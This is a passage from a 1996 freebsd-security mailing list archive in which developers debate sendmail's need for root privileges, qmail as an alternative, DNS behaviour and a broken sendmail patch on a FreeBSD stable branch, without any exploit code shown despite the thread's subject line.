]] realtime instrument control.         (ph) +61-8-8267-3493            [[
]] Unix hardware collector.             "Where are your PEZ?"
The Tick [[ From owner-freebsd-security Sun Nov 17 20:46:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09304 for security-outgoing; Sun, 17 Nov 1996 20:46:45 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA09283 for ; Sun, 17 Nov 1996 20:46:37 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPLaR-0003jx-00; Sun, 17 Nov 1996 21:45:35 -0700 To: newton@communica.com.au (Mark Newton) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 13:42:43 +1030." <9611180312.AA15775@communica.com.au> References: <9611180312.AA15775@communica.com.au> Date: Sun, 17 Nov 1996 21:45:35 -0700 
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <9611180312.AA15775@communica.com.au> Mark Newton writes:
: Garbage. You can create the mailbox at the same time that you create
: the user (as part of the adduser script). Set the mailbox's gid to
: "smtp" and run sendmail with the "smtp" gid (actually, I don't do this
: on our gateway machine at Communica: Nobody ever logs in to it, nobody
: ever receives mail on it, sendmail is configured to forward "local" mail
: to an internal host; special privileges to write local mailboxes aren't
: needed, so sendmail doesn't get them given to it).

And if that file is ever removed? Then you are SOL.

: Removing shell escapes from .forward is, IMHO, of a similar league to
: disabling the functionality of .rhosts files. Shell escapes are, and always
: have been, a feature which permits unaccountable abuses of security to
: provide "ease of use" which only a small subset of users really care about.

I'm sorry, but that is not an acceptable answer in a general purpose OS. What you do on your system is OK, but that is *NOT* a good reason to remove sendmail from the base OS. People expect the ability to run whatever they please, or at least a subset selected by the admin. In order to do that, the mail agent must run as that person. In order to do that, the mail agent must either run a setuid program that is accessible to the mail delivery agent (and likely others), or it must run as root.

Your arguments are good for security in general, but they break too many things for the general OS case. I'm sorry, but saying "and if you disable these features, then your mail agent doesn't need to run as root" is not a valid argument. Finding a secure way to run your MTA to provide those features is a better exercise.

: [ tomorrow's lesson: Why does lpd run as root? ]

Most of the time it doesn't, at least on NetBSD and OpenBSD.
:-) Warner From owner-freebsd-security Sun Nov 17 20:55:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09776 for security-outgoing; Sun, 17 Nov 1996 20:55:03 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA09764 for ; Sun, 17 Nov 1996 20:54:51 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPLig-0003lG-00; Sun, 17 Nov 1996 21:54:06 -0700 To: newton@communica.com.au (Mark Newton) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: msmith@atrad.adelaide.edu.au (Michael Smith), batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 15:05:38 +1030." <9611180435.AA17191@communica.com.au> References: <9611180435.AA17191@communica.com.au> Date: Sun, 17 Nov 1996 21:54:06 -0700 
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <9611180435.AA17191@communica.com.au> Mark Newton writes:
: That's a wonderful point: The only reason sendmail needs root to bind to
: port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP
: ports less than 1024 can only be allocated by a privileged user. TCP/IP
: implementations on non-UNIX platforms disagree violently with this
: assumption, which makes the value of this "security" feature rather dubious.
:
: It would be foolish of me to argue to have it changed, though :-)

Since sendmail closes port 25 when the load average is high, it would be a bad idea to allow just anybody to bind to port 25 in this case. Just a few forks, wait for the load average to get high, then grab the port.... :-)

The binding to ports < 1024 on the local system being restricted to non-normal users is a good thing. Sadly, on Unix you can't do much better than having it being root, since most Unix systems aren't designed to have fine grain system privs.

It is hard to design a foolproof mail system, because the fools out there are so ingenious....

Warner

From owner-freebsd-security Sun Nov 17 20:58:14 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09976 for security-outgoing; Sun, 17 Nov 1996 20:58:14 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA09961 for ; Sun, 17 Nov 1996 20:57:59 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id UAA14688; Sun, 17 Nov 1996 20:57:45 -0800 (PST)
From: Don Lewis
Message-Id: <199611180457.UAA14688@salsa.gv.ssi1.com>
Date: Sun, 17 Nov 1996 20:57:45 -0800
In-Reply-To: Adam Shostack "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 17, 10:35pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Adam Shostack , msmith@atrad.adelaide.edu.au (Michael Smith)
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: freebsd-security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 17, 10:35pm, Adam Shostack wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} smap/smapd (from the TIS firewall toolkit) can handle mail delivery
} services & binding to port 25. They're designed for security.

But they don't do ESMTP, smapd relies on sendmail to forward the mail onto its next hop, and I think smap/smapd also fell prey to the syslog() hole (though the damage they could potentially do is quite limited).

--- Truck

From owner-freebsd-security Sun Nov 17 21:06:12 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA10401 for security-outgoing; Sun, 17 Nov 1996 21:06:12 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA10393 for ; Sun, 17 Nov 1996 21:06:01 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id VAA14699; Sun, 17 Nov 1996 21:05:18 -0800 (PST)
From: Don Lewis Message-Id: <199611180505.VAA14699@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 21:05:18 -0800 In-Reply-To: newton@communica.com.au (Mark Newton) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 3:05pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: newton@communica.com.au (Mark Newton), msmith@atrad.adelaide.edu.au (Michael Smith) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 3:05pm, Mark Newton wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } Michael Smith wrote: } > but his point is } > valid. In fact, if it were possible to be non-root and bind to port 25, } } That's a wonderful point: The only reason sendmail needs root to bind to } port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP } ports less than 1024 can only be allocated by a privileged user. TCP/IP } implementations on non-UNIX platforms disagree violently with this } assumption, which makes the value of this "security" feature rather dubious. And on those platforms, J. Random user could intercept all incoming mail. 
Binding a socket to port 23 would be a good way to collect telnet passwords, too ;-) --- Truck From owner-freebsd-security Sun Nov 17 21:11:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA10616 for security-outgoing; Sun, 17 Nov 1996 21:11:52 -0800 (PST) Received: from coven.queeg.com (queeg.com [204.95.70.218]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA10609 for ; Sun, 17 Nov 1996 21:11:30 -0800 (PST) Received: (from brion@localhost) by coven.queeg.com (8.8.3/8.7.3) id VAA08087; Sun, 17 Nov 1996 21:10:50 -0800 (PST) Date: Sun, 17 Nov 1996 21:10:50 -0800 (PST) Message-Id: <199611180510.VAA08087@coven.queeg.com> 
From: Brion Moss
To: "Daniel O'Callaghan"
Cc: Mark Newton , freebsd-security@FreeBSD.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To:
References: <9611180247.AA15359@communica.com.au>
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Daniel O'Callaghan writes:
> On Mon, 18 Nov 1996, Mark Newton wrote:
> > Of course, one of the main reasons why sendmail is so "dangerous" is that
> > despite fifteen years of it-hurts-when-I-do-this style experience, we *still*
> > run it as root! Why do we do this? Why does nobody understand that a UNIX
> > process can't just gratuitously gain privileges unless some other privileged
> > program gives them away? Given sendmail's history, why do so many people
> > still trust it with root privileges when it doesn't actually need them?!
> >
> > sendmail really only needs root so that it can bind to the "privileged"
> > port 25 when it's running in daemon mode. If you frob filesystem permissions
> > sufficiently you can get away without providing sendmail with root
> > privileges by running it with a non-root uid out of inetd (which is,
> > indeed, precisely what I have done with it here at Communica, where
> > sendmail runs as the unprivileged "smtp" user).
>
> I've been thinking about this, too. Why *does* sendmail need to run as root?
> a) to bind to port 25 (fixable with inetd, and other ways)
> b) to operate on the mail queue (fixable with a group 'mail' or somesuch)
> c) to deliver local mail - nope, /usr/libexec/mail.local is suid root to
>    do this.
>
> Are there any other reasons?
>
> Danny

Maybe this is a bit too obvious a suggestion, but why not look at the
Sendmail Installation and Operation Guide (found in doc/op of the sendmail
distribution; try not to laugh when you read the first line):

    4.7.1. To suid or not to suid?

    Sendmail can safely be made setuid to root. At the point where it is
    about to exec(2) a mailer, it checks to see if the userid is zero; if
    so, it resets the userid and groupid to a default (set by the u and g
    options). (This can be overridden by setting the S flag to the mailer
    for mailers that are trusted and must be called as root.) However,
    this will cause mail processing to be accounted (using sa(8)) to root
    rather than to the user sending the mail.

    If you don't make sendmail setuid to root, it will still run but you
    lose a lot of functionality and a lot of privacy, since you'll have to
    make the queue directory world readable. You could also make sendmail
    setuid to some pseudo-user (e.g., create a user called "sendmail" and
    make sendmail setuid to that) which will fix the privacy problems but
    not the functionality issues. Also, this isn't a guarantee of
    security: for example, root occasionally sends mail, and the daemon
    often runs as root.

So, with careful thought, we could probably drop that pesky bit...

-Brion

From owner-freebsd-security Sun Nov 17 21:31:19 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA11811 for security-outgoing; Sun, 17 Nov 1996 21:31:19 -0800 (PST)
Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA11798 for ; Sun, 17 Nov 1996 21:31:10 -0800 (PST)
Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id WAA25009; Sun, 17 Nov 1996 22:30:45 -0700 (MST)
Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id WAA00963; Sun, 17 Nov 1996 22:30:24 -0700 (MST)
Date: Sun, 17 Nov 1996 22:30:19 -0700 (MST)
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Warner Losh
cc: Mark Newton , freebsd-security@FreeBSD.ORG
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

While I agree with what Warner says below, I think Warner would agree
that there is no reason that there should not be a fast easy no-brains
method of switching to a more secure system, with the accompanying
limitations, if so desired.

While I don't see things like sendmail and lpd moving out of the base
distribution anytime soon, I do think that it would be an excellent idea
to let (and encourage; like a big screen in sysinstall letting you go
through a menu driven procedure) more secure alternatives be implemented
without the admin (who, in many cases, isn't someone who admins Unix for
a living) having to do a lot of work.

I have a grand scheme for a program that is a frontend to things like:
	- removing the setuid bit from programs you don't use, and
	  giving you a nice explanation of what the effects are
	- installing and configuring tcp wrappers
	- configuring automated logging and notification of important
	  security events; ie. a setup program for something like swatch.
	- updating your system with recent patches for things like the
	  bazillion holes that have been found in the past, are being
	  found now, and will be found long into the future.
	- shooting intruders on sight.

This would be implemented with either one big program or, more likely,
a bunch of little programs with a consistent pretty (ie. sysinstall like,
although libdialog is ugly) interface and a parent program that lets you
run any of them.

Perhaps some day I will get around to trying to make such a program.

If someone is too stupid to care at all about security, that's their
problem. I think, however, that there are a lot of people out there who
do care, but have neither the knowledge nor the time to do a lot about it.

On Sun, 17 Nov 1996, Warner Losh wrote:

> I'm sorry, but that is not an acceptable answer in a general purpose
> OS. What you do on your system is OK, but that is *NOT* a good reason
> to remove sendmail from the base OS. People expect the ability to run
> whatever they please, or at least a subset selected by the admin. In
> order to do that, the mail agent must run as that person. In order to
> do that, the mail agent must either run a setuid program that is
> accessible to the mail delivery agent (and likely others), or it must
> run as root.

From owner-freebsd-security Sun Nov 17 21:36:41 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA12291 for security-outgoing; Sun, 17 Nov 1996 21:36:41 -0800 (PST)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id VAA12197 for ; Sun, 17 Nov 1996 21:36:07 -0800 (PST)
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPMN0-0003py-00; Sun, 17 Nov 1996 22:35:46 -0700
To: Marc Slemko
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: Mark Newton , freebsd-security@freebsd.org
In-reply-to: Your message of "Sun, 17 Nov 1996 22:30:19 MST."
References:
Date: Sun, 17 Nov 1996 22:35:46 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message Marc Slemko writes:
: While I agree with what Warner says below, I think Warner would agree
: that there is no reason that there should not be a fast easy
: no-brains method of switching to a more secure system, with the
: accompanying limitations, if so desired.

Agreed.
	cd /usr/ports/mail/XXXX ; make ; make install
should, in an ideal world, be all that is needed. Or something that is
that simple to do.

: - updating your system with recent patches for things like the
:   bazillion holes that have been found in the past, are being
:   found now, and will be found long into the future.

:-) Look at the lpr/lpd checkins I've made :-). In fact, if others want,
the OpenBSD CVS tree is a wealth of patches for those that have the time
to wade through it.

: - shooting intruders on sight.

Naw. Boiling them in hot oils is much more fun :-).

Warner

From owner-freebsd-security Sun Nov 17 22:11:48 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14254 for security-outgoing; Sun, 17 Nov 1996 22:11:48 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14232 for ; Sun, 17 Nov 1996 22:11:14 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13574 for ; Mon, 18 Nov 1996 07:11:03 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08166 for freebsd-security@freebsd.org; Mon, 18 Nov 1996 07:10:47 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id HAA23337; Mon, 18 Nov 1996 07:02:55 +0100 (MET)
Message-ID:
Date: Mon, 18 Nov 1996 07:02:55 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
References: <9611180247.AA15359@communica.com.au>
X-Mailer: Mutt 0.50.05
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686
In-Reply-To: ; from Daniel O'Callaghan on Nov 18, 1996 15:18:14 +1100
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Daniel O'Callaghan:
>
> Are there any other reasons?

d) process .forward files as the user.

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996

From owner-freebsd-security Sun Nov 17 22:11:52 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14259 for security-outgoing; Sun, 17 Nov 1996 22:11:52 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14236 for ; Sun, 17 Nov 1996 22:11:19 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13577 for ; Mon, 18 Nov 1996 07:11:05 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08167 for freebsd-security@FreeBSD.ORG; Mon, 18 Nov 1996 07:10:47 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id HAA23346; Mon, 18 Nov 1996 07:04:18 +0100 (MET)
Message-ID:
Date: Mon, 18 Nov 1996 07:04:17 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
References: <199611180225.FAA01413@nagual.ru>
X-Mailer: Mutt 0.50.05
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686
In-Reply-To: ; from Marc Slemko on Nov 17, 1996 21:18:29 -0700
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Marc Slemko:
> Incorrect. Sendmail still attempts a lookup for something, I think it is
> the local hostname, for each piece of mail it processes. Last I checked,
> this could NOT be disabled without recompiling sendmail. Modifying your
> config file or adding a service.switch file does not stop it.

No, use FEATURE(nocanonify). Been running with this without DNS for ages.

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996

From owner-freebsd-security Sun Nov 17 22:11:59 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14269 for security-outgoing; Sun, 17 Nov 1996 22:11:59 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14243 for ; Sun, 17 Nov 1996 22:11:24 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13581 for ; Mon, 18 Nov 1996 07:11:11 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08168 for freebsd-security@FreeBSD.ORG; Mon, 18 Nov 1996 07:10:47 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id HAA23355; Mon, 18 Nov 1996 07:06:21 +0100 (MET)
Message-ID:
Date: Mon, 18 Nov 1996 07:06:20 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
References: <199611180134.RAA14418@salsa.gv.ssi1.com>
X-Mailer: Mutt 0.50.05
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686
In-Reply-To: <199611180134.RAA14418@salsa.gv.ssi1.com>; from Don Lewis on Nov 17, 1996 17:34:25 -0800
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Don Lewis:
> Qmail doesn't do all the ESMTP negotiation that sendmail does. It keeps
> qmail simpler and less likely to be buggy, but not as functional. For
> instance sendmail 8.7.x supports: 8BITMIME, SIZE, DSN, VERB, ONEX, but
> whatever version of qmail I just checked only supports 8BITMIME and
> PIPELINING. Sendmail 8.8.x adds ETRN.

I don't think it handles 8BITMIME at all even if it announces it. Does it
support rewriting from 8bit to 7bit and reverse ?

> Sendmail's support of UUCP isn't wonderful (mostly a problem of
> getting DNS totally disabled). How well does qmail support UUCP?

That's a common misunderstanding. UUCP support in sendmail is pretty good
(see my other mail). qmail is BAD for UUCP (and the author doesn't care).

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996

From owner-freebsd-security Sun Nov 17 22:12:04 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14286 for security-outgoing; Sun, 17 Nov 1996 22:12:04 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14245 for ; Sun, 17 Nov 1996 22:11:27 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13585 for ; Mon, 18 Nov 1996 07:11:15 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08165 for freebsd-security@FreeBSD.ORG; Mon, 18 Nov 1996 07:10:46 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id GAA23325; Mon, 18 Nov 1996 06:59:35 +0100 (MET)
Message-ID:
Date: Mon, 18 Nov 1996 06:59:34 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
References: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> <199611180005.TAA09457@homeport.org>
X-Mailer: Mutt 0.50.05
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686
In-Reply-To: <199611180005.TAA09457@homeport.org>; from Adam Shostack on Nov 17, 1996 19:05:45 -0500
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Adam Shostack:
> planning to replace sendmail with qmail real soon, and that helps me a
> lot. My suggestion was meant to imply the possibility of removing
> sendmail from the FreeBSD distribution, and only shipping qmail.

I'd strongly object to this. In addition to what Warner said I must add
that qmail's UUCP support is nonexistent or rather anti-UUCP in the sense
that it generates multiple messages when a mail has multiple recipients.
I manage several mailing-lists on my home machine and am the administrator
of another one with lots of UUCP users and qmail is unusable.

I still can't bear the configuration system of qmail (lots of .qmail-mumble
everywhere, user defined mailing-lists that can't be disabled) and the
author's attitude in general[1] (but that's another problem).

[1] like pretending that sending 300 messages with 1 recipient is smaller
    than sending 1 mail with 300 recipients by UUCP.

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996

From owner-freebsd-security Sun Nov 17 22:17:09 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14700 for security-outgoing; Sun, 17 Nov 1996 22:17:09 -0800 (PST)
Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14643; Sun, 17 Nov 1996 22:16:36 -0800 (PST)
Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.7.5/8.7.3) id WAA05595; Sun, 17 Nov 1996 22:15:47 -0800 (PST)
From: "Rodney W. Grimes"
Message-Id: <199611180615.WAA05595@GndRsh.aac.dev.com>
Subject: Re: New sendmail bug...
In-Reply-To: from S at "Nov 17, 96 09:39:11 pm"
To: spork@super-g.com (S)
Date: Sun, 17 Nov 1996 22:15:46 -0800 (PST)
Cc: eric@sendmail.org, igor@alecto.physics.uiuc.edu, roberto@keltia.freenix.fr, freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL25 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> But if one does have to run 8.7.6 until they have time to breathe, does
> anyone know if the error that Igor and I are seeing compiling 8.7.6 from
> -stable can be avoided? I first patched with the 2 line setgid, setuid
> patch I saw on the list, then I grabbed what was in the current -stable
> source and got the same error as Igor. It compiled after deleting the
> line in main.c that I saw in the errors, and it seems to work, but
> reckless deletion scares me. I wonder what the line was for....
>
> Anyhow, any help is appreciated.

Someone (who shall remain nameless) has committed a bad patch into the
RELENG_2_1_0 branch. What is in there does not compile, I get the exact
same error that this person has reported, and this is on a pristine
RELENG_2_1_0 compile engine.... this error occurred during a ``make world'',
so if _vendor_daemon_setup is supposed to be defined someplace else we have
a build cycle problem, if sendmail is supposed to have source code for this,
someone missed a piece of the patch :-(.

PLEASE FIX ASAP, as all -Stable users trying to update via the normal
mechanisms to fix the sendmail security problem are going to have builds
that blow up in their face.

> Thanks,
>
> Charles
>
> On Sun, 17 Nov 1996, Eric Allman wrote:
>
> > This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8;
> > 8.7.x is no longer supported.
> >
> > eric
> >
> >
> > ============= In Reply To: ===========================================
> > : From: igor@alecto.physics.uiuc.edu (Igor Roshchin)
> > : Subject: Re: New sendmail bug...
> > : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST)
> >
> > : Hello!
> > :
> > : May be I am missing something,
> > : but I was not able to compile the patched version
> > : of the sendmail 8.7.6.4,
> > : as it appears in FreeBSD distribution (sup.freebsd.org).
> > :
> > : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment
> > : *** Error code 1

Yepp... the source tree is muffed up :-(.

--
Rod Grimes                                      rgrimes@gndrsh.aac.dev.com
Accurate Automation, Inc.                   Reliable computers for FreeBSD

From owner-freebsd-security Sun Nov 17 22:56:26 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA16576 for security-outgoing; Sun, 17 Nov 1996 22:56:26 -0800 (PST)
Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA16566 for ; Sun, 17 Nov 1996 22:56:11 -0800 (PST)
Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id XAA29013; Sun, 17 Nov 1996 23:55:56 -0700 (MST)
Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id XAA01449; Sun, 17 Nov 1996 23:55:34 -0700 (MST)
Date: Sun, 17 Nov 1996 23:55:33 -0700 (MST)
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Ollivier Robert
cc: freebsd-security@FreeBSD.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Incorrect. It RUNS without DNS but still TRIES to use it. If you really
don't have IP connectivity, then the difference doesn't matter because it
still works when the lookup fails, however it still does try and the
difference does matter if you have partial IP connectivity.

I have a system set up with nocanonify and all the other config file
tweaks I know of, and it still tries to use DNS as a tcpdump shows quite
clearly. This system is running 8.7.5, so things may have been changed in
more recent versions but I can't say for sure; if this has changed in more
recent versions, please let me know.

I _think_ the define that needs to be set to 0 is NAMED_BIND, but don't
recall for sure.

This has been gone over before on the lists. Any more followups I make to
this will go to -hackers.

On Mon, 18 Nov 1996, Ollivier Robert wrote:

> According to Marc Slemko:
> > Incorrect. Sendmail still attempts a lookup for something, I think it is
> > the local hostname, for each piece of mail it processes.. Last I checked,
> > this could NOT be disabled without recompiling sendmail. Modifying your
> > config file or adding a service.switch file does not stop it.
>
> No, use FEATURE(nocanonify). Been running with this without DNS for ages.
>
> --
> Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
> FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996
>

From owner-freebsd-security Sun Nov 17 23:16:08 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA17695 for security-outgoing; Sun, 17 Nov 1996 23:16:08 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA17660; Sun, 17 Nov 1996 23:15:42 -0800 (PST)
